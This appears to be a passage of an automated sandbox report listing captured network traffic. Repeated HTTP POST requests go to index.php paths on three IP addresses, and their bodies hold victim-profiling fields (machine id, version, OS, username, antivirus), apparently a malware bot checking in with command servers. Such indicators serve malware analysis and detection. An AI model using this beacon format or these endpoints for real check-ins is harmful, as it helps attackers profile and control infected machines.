                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
